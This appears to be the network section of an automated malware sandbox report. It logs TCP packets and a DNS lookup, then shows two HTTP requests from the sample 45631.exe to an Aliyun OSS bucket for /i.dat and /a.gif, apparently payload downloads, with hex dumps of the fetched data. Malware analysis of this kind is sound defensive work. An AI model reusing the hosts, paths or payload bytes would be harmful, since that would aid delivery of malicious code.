                    Jan 2, 2025 12:08:42.272490978 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:42.272716045 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:42.272723913 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:42.272744894 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:42.272767067 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:42.272782087 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:42.272835016 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:42.272887945 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:42.272911072 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:42.272950888 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:42.273021936 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:42.479345083 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:42.479407072 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:42.495810986 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:42.495824099 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:42.495840073 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:42.495846033 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:42.496056080 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:42.496062994 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:42.496140957 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:42.582083941 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:42.582093000 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:42.582122087 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:42.582139015 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:42.582226992 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:42.582232952 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:42.582251072 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:42.582283020 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:42.582288027 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:42.582308054 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:42.582345009 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:42.582353115 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:42.582401037 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:42.582463026 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:42.787336111 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:42.787497997 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:42.857868910 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:42.857889891 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:42.857908010 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:42.857918978 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:42.858010054 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:42.858019114 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:42.858064890 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:42.858086109 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:42.952748060 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:42.952755928 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:42.952775955 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:42.952792883 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:42.952928066 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:42.952935934 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:42.952948093 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:42.952996016 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:42.953016043 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:42.953016043 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:42.953035116 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:42.953041077 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:42.953092098 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:42.953146935 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:43.163343906 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:43.163397074 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:43.240071058 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:43.240082026 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:43.240099907 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:43.240219116 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:43.240226030 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:43.240298033 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:43.336414099 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:43.336421013 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:43.336443901 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:43.336461067 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:43.336559057 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:43.336608887 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:43.633269072 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:43.742280006 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:44.366837025 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:44.366859913 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:44.571991920 CET49980443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:44.572061062 CET4434998039.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:44.572237968 CET49980443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:44.572551012 CET49980443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:44.572566032 CET4434998039.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:45.785752058 CET4434998039.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:45.785959005 CET49980443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:45.786601067 CET49980443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:45.786607027 CET4434998039.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:45.786803007 CET49980443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:45.786808014 CET4434998039.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:46.114661932 CET4434998039.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:46.114682913 CET4434998039.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:46.114720106 CET4434998039.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:46.114738941 CET49980443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:46.114754915 CET4434998039.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:46.114767075 CET49980443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:46.114787102 CET49980443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:46.114801884 CET49980443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:46.115514040 CET4434998039.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:46.115573883 CET49980443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:46.342590094 CET4434998039.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:46.342700005 CET49980443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:46.342808008 CET4434998039.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:46.342881918 CET49980443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:46.343563080 CET4434998039.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:46.343600035 CET4434998039.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:46.343621969 CET49980443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:46.343630075 CET4434998039.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:46.343641996 CET49980443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:46.343669891 CET49980443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:46.343676090 CET4434998039.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:46.343705893 CET4434998039.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:46.343713999 CET49980443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:46.343749046 CET49980443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:46.343935013 CET49980443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:46.343945026 CET4434998039.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:46.359054089 CET49981443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:46.359087944 CET4434998139.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:46.359181881 CET49981443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:46.359400034 CET49981443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:46.359414101 CET4434998139.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:47.610652924 CET4434998139.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:47.610824108 CET49981443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:47.611310005 CET49981443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:47.611321926 CET4434998139.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:47.611615896 CET49981443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:47.611620903 CET4434998139.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:47.945377111 CET4434998139.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:47.945400000 CET4434998139.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:47.945466042 CET49981443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:47.945482016 CET4434998139.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:47.945538998 CET49981443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:47.945538998 CET49981443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:47.945646048 CET4434998139.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:47.945714951 CET49981443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:47.945720911 CET4434998139.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:47.945730925 CET4434998139.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:47.945800066 CET49981443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:47.949186087 CET49981443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:47.949202061 CET4434998139.103.20.59192.168.2.5
                    TimestampSource PortDest PortSource IPDest IP
                    Jan 2, 2025 12:08:28.838545084 CET4929153192.168.2.51.1.1.1
                    Jan 2, 2025 12:08:29.470566034 CET53492911.1.1.1192.168.2.5
                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                    Jan 2, 2025 12:08:28.838545084 CET192.168.2.51.1.1.10x4643Standard query (0)ry2ihs.oss-cn-beijing.aliyuncs.comA (IP address)IN (0x0001)false
                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                    Jan 2, 2025 12:08:29.470566034 CET1.1.1.1192.168.2.50x4643No error (0)ry2ihs.oss-cn-beijing.aliyuncs.comsc-2cuv.cn-beijing.oss-adns.aliyuncs.comCNAME (Canonical name)IN (0x0001)false
                    Jan 2, 2025 12:08:29.470566034 CET1.1.1.1192.168.2.50x4643No error (0)sc-2cuv.cn-beijing.oss-adns.aliyuncs.comsc-2cuv.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                    Jan 2, 2025 12:08:29.470566034 CET1.1.1.1192.168.2.50x4643No error (0)sc-2cuv.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com39.103.20.59A (IP address)IN (0x0001)false
                    • ry2ihs.oss-cn-beijing.aliyuncs.com
                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.54997539.103.20.594435600C:\Users\user\Desktop\45631.exe
                    TimestampBytes transferredDirectionData
                    2025-01-02 11:08:30 UTC111OUTGET /i.dat HTTP/1.1
                    User-Agent: GetData
                    Host: ry2ihs.oss-cn-beijing.aliyuncs.com
                    Cache-Control: no-cache
                    2025-01-02 11:08:31 UTC558INHTTP/1.1 200 OK
                    Server: AliyunOSS
                    Date: Thu, 02 Jan 2025 11:08:30 GMT
                    Content-Type: application/octet-stream
                    Content-Length: 512
                    Connection: close
                    x-oss-request-id: 677673AEE80D013639011740
                    Accept-Ranges: bytes
                    ETag: "2CAD33745064F8D09878A5E2E439F0F8"
                    Last-Modified: Thu, 02 Jan 2025 10:14:48 GMT
                    x-oss-object-type: Normal
                    x-oss-hash-crc64ecma: 1664869953454276110
                    x-oss-storage-class: Standard
                    x-oss-ec: 0048-00000113
                    Content-Disposition: attachment
                    x-oss-force-download: true
                    Content-MD5: LK0zdFBk+NCYeKXi5Dnw+A==
                    x-oss-server-time: 12
                    2025-01-02 11:08:31 UTC512INData Raw: 07 1b 1b 1f 6c 25 30 30 42 49 02 59 31 2a 77 36 45 45 1b 55 3b 78 37 30 59 5a 59 5e 39 70 3f 32 5b 4b 47 5c 3f 2f 72 3f 50 52 10 5e 70 39 37 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 50 4c 4c 48 3b 72 67 67 15 1e 55 0e 66 7d 20 61 12 12 4c 02 6c 2f 60 67 0e 0d 0e 09 6e 27 68 65 0c 1c 10 0b 68 78 25 68 07 05 47 0a 24 6d 63 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 04 18 18 1c 6f 26 33 33 41 4a 01 5a 32 29 74 35 46 46 18 56 38 7b 34 33 5a 59 5a 5d 3a 73 3c 31 58 48 44 5f 3c 2c 71 3c 53 51 13 5f 71 38 36 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 51 4d 4d 49 3a 73 66 66 14 1f 54 0f 67 7c 21
                    Data Ascii: l%00BIY1*w6EEU;x70YZY^9p?2[KG\?/r?PR^p97888888888888888888888888888888888PLLH;rggUf} aLl/`gn'hehx%hG$mclllllllllllllllllllllllllllllllllo&33AJZ2)t5FFV8{43ZYZ]:s<1XHD_<,q<SQ_q86999999999999999999999999999999999QMMI:sffTg|!


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    1192.168.2.54997639.103.20.594435600C:\Users\user\Desktop\45631.exe
                    TimestampBytes transferredDirectionData
                    2025-01-02 11:08:32 UTC111OUTGET /a.gif HTTP/1.1
                    User-Agent: GetData
                    Host: ry2ihs.oss-cn-beijing.aliyuncs.com
                    Cache-Control: no-cache
                    2025-01-02 11:08:32 UTC545INHTTP/1.1 200 OK
                    Server: AliyunOSS
                    Date: Thu, 02 Jan 2025 11:08:32 GMT
                    Content-Type: image/gif
                    Content-Length: 135589
                    Connection: close
                    x-oss-request-id: 677673B02A0577333132E07B
                    Accept-Ranges: bytes
                    ETag: "0DDD3F02B74B01D739C45956D8FD12B7"
                    Last-Modified: Thu, 02 Jan 2025 10:14:14 GMT
                    x-oss-object-type: Normal
                    x-oss-hash-crc64ecma: 8642451798640735006
                    x-oss-storage-class: Standard
                    x-oss-ec: 0048-00000104
                    Content-Disposition: attachment
                    x-oss-force-download: true
                    Content-MD5: Dd0/ArdLAdc5xFlW2P0Stw==
                    x-oss-server-time: 2
                    2025-01-02 11:08:32 UTC3551INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                    Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                    2025-01-02 11:08:32 UTC4096INData Raw: 94 95 15 58 67 66 8f 0d ac 9c 9e d7 25 61 ea 28 7c d1 e2 ef 25 bc 8d ce ad ad e6 24 78 4e a7 6d 84 b4 b6 ff 3d 79 ce ae f0 30 fa 9b e0 89 4f 97 e0 f5 8e 4a c5 b1 9a ca cc 32 1e 44 28 99 59 18 2b c0 75 e7 d9 d9 59 24 df a8 d2 97 6d ad c6 d3 0c 89 da e7 e8 02 e8 d8 2c a5 6b 2f b8 7a 4e d7 b4 f7 f6 f7 b0 72 66 df ac ff fe ff 48 88 07 bd b1 04 06 08 8c db 0a 0b 0c 45 83 1a 91 41 13 13 5c 9e de e8 0d 61 2a 1a 1c 55 95 12 81 94 23 23 6c a8 33 5d 78 28 2a 63 a5 28 4d 9a 31 31 cd 26 69 05 37 37 70 b2 37 bd 89 3c 3e 77 cd 54 35 13 45 45 0e ce 4d 39 ff 4a 4c b2 5b 0d 60 50 52 1b df 58 3d e2 59 59 12 d6 49 39 0e 5e 60 29 eb 66 89 d1 67 67 97 7c 4d 5b 6d 6d 26 e4 7d 21 c7 72 74 3d fb 62 21 29 7b 7b 34 f4 7b 65 35 80 82 7c 91 89 b6 86 88 c1 01 86 b9 38 8f 8f d8 1c 87
                    Data Ascii: Xgf%a(|%$xNm=y0OJ2D(Y+uY$m,k/zNrfHEA\a*U##l3]x(*c(M11&i77p7<>wT5EEM9JL[`PRX=YYI9^`)fgg|M[mm&}!rt=b!){{4{e5|8
                    2025-01-02 11:08:32 UTC4096INData Raw: 81 49 b6 96 98 1c 6c ee db d5 13 d3 84 f1 5d b6 e1 84 a7 a7 2b 69 ab e7 cf 4d e3 ac 54 4e a7 ed 94 b4 b6 fa 33 7d f2 30 74 8e 6c 40 d5 d9 e2 c2 c4 8d 43 07 80 42 22 bf df 85 43 9b f4 81 9f 58 10 9d 5d 1f 30 41 ec db dc 91 55 32 ac 68 89 d3 6f e0 e9 41 e9 e9 a2 66 e1 81 4b ee f0 ca 0c 7a b7 c9 f9 b8 06 06 ef 75 dc fc fe b7 8b 0c 95 97 05 05 4a 8c a4 2d 7a 03 0c 0d 42 84 b4 35 6a 1b 14 15 5e 94 e1 e6 52 90 b0 39 86 17 20 21 57 69 6c ae 23 a5 8d 28 2a 67 a7 20 5d 8a 31 31 7e b8 31 61 93 36 38 b2 2f 4d 99 3c 3e 86 41 41 42 43 08 cc 32 63 60 01 c3 0f 68 6d b1 5a 51 f4 53 53 1c de 5b 15 cc 58 5a de 9c d6 ae 16 6f 29 ad e6 a4 2d ef 6a 59 fd 6b 6b 14 73 22 e2 3c 55 4e 36 47 b5 cc f9 6b 79 7a 33 bb 39 5a 5f 84 81 82 83 7b 90 cd 22 89 89 01 7b c4 00 83 45 34 90 92
                    Data Ascii: Il]+iMTN3}0tl@CB"CX]0AU2hoAfKzuJ-zB5j^R9 !Wil#(*g ]11~1a68/M<>AABC2c`hmZQSS[XZo)-jYkks"<UN6Gkyz39Z_{"{E4
                    2025-01-02 11:08:32 UTC4096INData Raw: 9b 94 96 df 13 d5 be cb 63 88 7d 90 a1 a1 ea 2e a9 c1 30 a6 a8 56 bf 6d bc ac ae 2a 4f c9 af 32 4f 3f a5 b7 b8 cd af 3a 47 36 ad bf c0 b5 cf 8b 4f 10 7f c7 cc c9 ca 23 79 3b 31 30 5b 16 9a 58 68 f1 76 d7 d8 d9 92 58 18 bd 9f 82 a1 bd bc be bf 26 2a 2b 24 25 26 27 20 21 22 23 3c 3d 3e 3f 38 bd 7f ab dc e9 b2 72 90 d9 e6 a8 48 82 ee 33 8f c4 4f 8c d0 41 81 f1 8f e5 0a 84 f9 1e 96 c1 14 15 16 94 e0 18 15 9f b1 1d 1e 1f 68 ac 2f 15 b1 24 26 6f a1 5d 0e 6b d3 38 75 3f 31 31 7a b8 39 51 b2 36 38 71 b9 c2 c3 48 6b 73 cb 4c 1d d6 45 45 0a cc 4d 09 df 4a 4c c6 5b 2d c5 50 52 1b d9 50 15 d3 59 59 e3 5a 5c 5d 5e 17 e9 25 46 4b 2c ee 63 25 fd 68 6a 23 e5 29 4a 4f 8f 64 ad e7 75 75 3e fc 75 59 fe 7a 7c f6 8e 37 03 49 7d 06 72 cd 89 cf 40 0c 7c c3 05 80 85 0b 91 91 ea
                    Data Ascii: c}.0Vm*O2O?:G6O#y;10[XhvX&*+$%&' !"#<=>?8rH3OAh/$&o]k8u?11z9Q68qHksLEEMJL[-PRPYYZ\]^%FK,c%hj#)JOduu>uYz|7I}r@|
                    2025-01-02 11:08:32 UTC4096INData Raw: ac d4 2f 87 98 99 9a d3 17 d5 96 ac 72 e9 2b ff 80 8d ee 2e e4 8d 96 e3 27 e1 8a 9f 77 f5 96 8b b5 b5 b6 b7 7f fd 9e ff be bd be bf 88 48 9e e7 e4 3a d3 4d 37 c9 ca 4e 0c b8 c8 30 c5 d1 d2 d2 d4 9d 5d 9b fc e9 25 ce c1 dd df df 27 e4 4d 65 e5 e5 e7 e7 e8 e9 d9 22 04 89 21 10 0f b9 7f fe 91 70 f7 f7 07 ec 75 fb fd fd b6 7c 3d 96 76 02 04 fa 4a 8a 05 31 fb f4 f3 41 87 02 81 94 13 13 d3 10 81 92 19 19 19 3b 1c 1d 56 96 3d 49 a7 22 24 6d af 3a a9 ac 2b 2b 59 16 6b 1c f0 79 bf 36 51 41 37 37 82 3a 1a 3b 3c 75 b7 7b 64 69 03 ce 0c 44 0e ce 14 6d 6a b4 59 49 cb 4e 50 19 d9 46 11 21 57 57 11 da 92 a4 d9 9d 17 50 28 b1 2a ea 71 51 12 66 68 21 e7 66 81 e9 6f 6f 8f 64 8d 8c 74 75 9e bd 90 86 85 33 f1 31 5a 2f b3 53 c3 3b 98 84 86 87 60 a1 ee 8b 8c c5 03 c3 b4 c1 55
                    Data Ascii: /r+.'wH:M7N0]%'Me"!pu|=vJ1A;V=I"$m:++Yky6QA77:;<u{diDmjYINPF!WWP(*qQfh!foodtu31Z/S;`U
                    2025-01-02 11:08:32 UTC4096INData Raw: d4 16 36 5f 98 99 9a 66 24 62 61 60 df e9 29 d7 80 cd ee 24 6c f9 f5 68 e4 28 58 db 05 f9 39 f7 90 85 fe 3e e4 9d da 38 c4 a9 be ca 84 a7 a4 a5 54 ca 71 d8 ae 4a 31 8a be c7 a8 4c 2b 8b a5 d7 b2 56 15 f7 d7 6e dc bd e1 9c de ad ea 87 df b9 e4 92 e2 81 ed c9 ea a3 6f 2a ec a7 73 37 f0 95 71 2e 82 b6 9e c2 22 8f 34 16 c4 99 66 91 64 65 94 0a b1 08 40 84 5e 2f 3c e5 dd 26 10 11 1d a4 1a 5d 9b 43 3c 29 7c 90 c4 55 9d d8 22 c9 9d 0a 24 25 6e a4 ee 2b 4c ae f7 59 2b 49 0b e9 46 e2 78 be 6a 13 78 36 8d f3 33 8a fd 77 cb 1d 66 23 6f 84 c6 3b 6c 01 4a 3f 44 0c cd ec 98 51 52 53 a9 1d dd 23 7c 31 12 d8 98 0d 01 9c ac ad ae af a8 2d e5 8b 50 ea 57 ae 06 6c 6e 6f 3c fa bb 7c f1 f7 76 77 78 31 ff b2 09 50 96 5d ad 81 82 c6 b7 4c c3 b4 48 ba 58 b8 45 c5 49 cb b4 b1 92
                    Data Ascii: 6_f$ba`)$lh(X9>8TqJ1L+Vno*s7q."4fde@^/<&]C<)|U"$%n+LY+IFxjx63wf#o;lJ?DQRS#|1-PWlno<|vwx1P]LHXEI
                    2025-01-02 11:08:32 UTC4096INData Raw: d5 c9 c9 c9 c5 5a 56 57 50 51 52 53 6c 6d 6e 6f 68 e5 f5 ef 2b 45 9a e3 29 64 e6 24 69 be 36 d4 b5 b5 b6 ff 3d 6b b5 3f e2 bc be bf 85 f2 10 8e 41 05 8a 4c 11 bd e2 8a c3 7a ce a9 55 11 a6 cc 95 6f d4 d7 d8 d9 93 e0 0e d2 58 25 e0 e1 e2 af 69 bc e4 81 61 e8 8c aa 2b ee d4 ef bd f2 28 be 71 3c 82 ad 9e b8 79 c2 fc 89 ad 99 66 91 64 65 94 4c 85 c5 09 45 31 d9 03 8e c5 0f 10 11 53 1c a3 14 5f 94 d9 1b 53 98 df 1f 78 5e a9 62 dc 45 65 a6 1f 27 5d f2 6b 24 9b 6c d0 49 0d 1e 32 47 29 53 0b 6b 38 4d 2d 72 bf ff 3f 73 7b 93 4d c0 d1 45 46 47 2e 08 8d 48 10 4d 07 cc 93 53 1a d8 18 71 36 1f dd 90 2e 73 3a de 67 5f 14 43 04 05 f4 2c e5 a5 69 25 51 b9 1f 02 61 d8 71 39 f1 b2 76 3c f5 b4 7a 1f 3b f2 3f 83 18 fc b9 81 f7 62 cc 0e ca a3 e0 c1 0f 42 f8 cb 81 38 91 f7 17
                    Data Ascii: ZVWPQRSlmnoh+E)d$i6=k?ALzUoX%ia+(q<yfdeLE1S_Sx^bEe']k$lI2G)Sk8M-r?s{MEFG.HMSq6.s:g_C,i%Qaq9v<z;?bB8
                    2025-01-02 11:08:32 UTC4096INData Raw: 17 55 b6 de 1b 71 9b ee 4c d5 15 1d f8 a0 a2 a3 54 26 26 c7 a9 a9 aa aa 6f 61 62 63 7c 7d 7e 7f 78 fd 33 7e b7 3d 2c bb bc bd 4e 3c c1 3e 8a 48 45 d5 c7 c7 c8 81 4f 0b b8 c9 3e 4c d0 2e 9a 58 55 f5 d7 d7 d8 91 5f 1b a8 d9 2e 5c e0 1e aa 68 65 fd e7 e7 e8 a1 6f 2b 98 e9 1e 6c f0 0e ba 78 75 c5 f7 f7 f8 b1 7f 3b 88 f9 0e 7c 00 fe 4a 8e 45 5d 47 bf 0e 09 0a 0b 40 80 03 fd 24 10 12 75 84 59 2f 5f e8 6d 16 53 97 0d 56 9a f2 55 26 d3 a7 27 d9 6f ab 51 d2 2b 58 20 66 a4 60 39 7a b6 e6 41 32 c7 bb 3b c5 73 bf fd 1e 76 c3 a9 43 36 94 0d cd c6 10 48 4a 4b bc ce ce 2f 51 51 52 ac 1c de 97 94 94 95 96 97 90 91 92 93 ac ad ae af a8 25 35 2f eb 85 4a 23 e9 bf 26 e4 aa 05 37 3b f1 bc 02 37 34 f2 6b 37 47 af 0a 50 c8 08 93 cb 0f 4f 6e 0d 76 76 75 c6 09 5f fa 90 d9 1a 58
                    Data Ascii: UqLT&&oabc|}~x3~=,N<>HEO>L.XU_.\heo+lxu;|JE]G@$uY/_mSVU&'oQ+X f`9zA2;svC6HJK/QQR%5/J#&7;74k7GPOnvvu_X
                    2025-01-02 11:08:32 UTC4096INData Raw: 1f 5a 7e 3d d3 99 9a d3 17 d6 8e 14 50 ae 14 e7 80 95 2e a6 41 2a aa ab ac e5 25 db 94 f1 31 7a 94 36 7e 48 31 f2 a2 f3 37 e1 9a f7 88 42 06 e3 9b 06 45 38 37 bd e9 48 33 33 ba d1 98 5a 15 9b 5f 1a 9e 5a cd d1 82 da dc 5e 3e c0 a8 20 1b e6 ac 8e 26 bf a0 ea ee 21 07 ea a6 62 f5 71 d8 f2 f4 03 b6 ff d8 8d e9 c8 2e 76 31 bb 8d 43 00 eb d9 44 06 07 40 8a f2 f4 78 2b 46 84 5b 01 98 57 30 25 9e 16 f3 0f a7 1a 1c 1d 1e 57 ad 75 06 13 af ea 62 ac ed c1 3d 60 2c 2d a5 df 0b c4 46 3a b7 7e 2e 17 bb f1 c5 d0 39 32 88 7b 64 71 0a c8 28 61 7e 0f c3 3d 6e 0b 04 c6 12 6b 18 19 d1 97 74 0a 95 9b 94 95 96 97 90 91 92 93 ac ad ae af a8 2d ef 3b 4c 79 3c 23 ef 81 0e 22 f5 b8 3f f8 a5 3c fd 87 30 f2 a0 37 f7 a4 0b 50 68 a1 7f 7c 7b c0 b5 4e cd ba 4a 4c 8c 9b 8e 8f 90 a2 52
